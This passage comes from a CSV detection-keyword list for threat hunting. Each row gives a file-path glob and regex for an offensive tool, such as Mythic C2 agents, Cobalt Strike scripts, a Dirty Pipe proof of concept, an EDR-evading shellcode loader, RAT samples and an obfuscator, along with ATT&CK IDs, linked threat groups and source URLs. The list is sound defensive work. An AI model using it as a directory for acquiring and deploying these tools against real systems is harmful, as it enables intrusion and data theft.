T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5236" "*/agent_code/cmd_executor*",".{0,1000}\/agent_code\/cmd_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5237" "*/agent_code/dll.go*",".{0,1000}\/agent_code\/dll\.go.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - 
T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","5238" "*/agent_code/merlin.*",".{0,1000}\/agent_code\/merlin\..{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","5239" "*/agent_code/powershell_executor*",".{0,1000}\/agent_code\/powershell_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5240" "*/agent_code/sh_executor*",".{0,1000}\/agent_code\/sh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5241" "*/agent_code/zsh_executor*",".{0,1000}\/agent_code\/zsh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - 
TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5242" "*/agent_functions/*.py*",".{0,1000}\/agent_functions\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5243" "*/agent_icons/athena.svg*",".{0,1000}\/agent_icons\/athena\.svg.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5244" "*/agents/thanatos/commands/*",".{0,1000}\/agents\/thanatos\/commands\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","5245" "*/AggressiveClean.cna*",".{0,1000}\/AggressiveClean\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","5246" "*/aggressor/*.java*",".{0,1000}\/aggressor\/.{0,1000}\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5247" "*/aggressor/spoolsystem.cna*",".{0,1000}\/aggressor\/spoolsystem\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5248" "*/aggressor-powerview*",".{0,1000}\/aggressor\-powerview.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","5249" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5250" 
"*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","5251" "*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","5252" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","#linux","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5253" "*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5254" "*/ahmedkhlief/Ninja/*",".{0,1000}\/ahmedkhlief\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","5261" "*/ahrixia/CVE_2022_0847*",".{0,1000}\/ahrixia\/CVE_2022_0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","5262" "*/ajp-auth.nse*",".{0,1000}\/ajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5263" "*/ajp-brute.nse*",".{0,1000}\/ajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5264" "*/ajp-headers.nse*",".{0,1000}\/ajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5265" "*/ajp-methods.nse*",".{0,1000}\/ajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5266" "*/ajp-request.nse*",".{0,1000}\/ajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5267" "*/AKID-RATV04.exe*",".{0,1000}\/AKID\-RATV04\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5268" "*/alan.log*",".{0,1000}\/alan\.log.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","#logfile #linux","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","5269" 
"*/Alan.v*.zip*",".{0,1000}\/Alan\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","5270" "*/Alaris.sln*",".{0,1000}\/Alaris\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","5271" "*/Alcatraz.exe*",".{0,1000}\/Alcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5272" "*/Alcatraz.git*",".{0,1000}\/Alcatraz\.git.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","5273" "*/Alcatraz/files/*/Alcatraz.zip*",".{0,1000}\/Alcatraz\/files\/.{0,1000}\/Alcatraz\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense 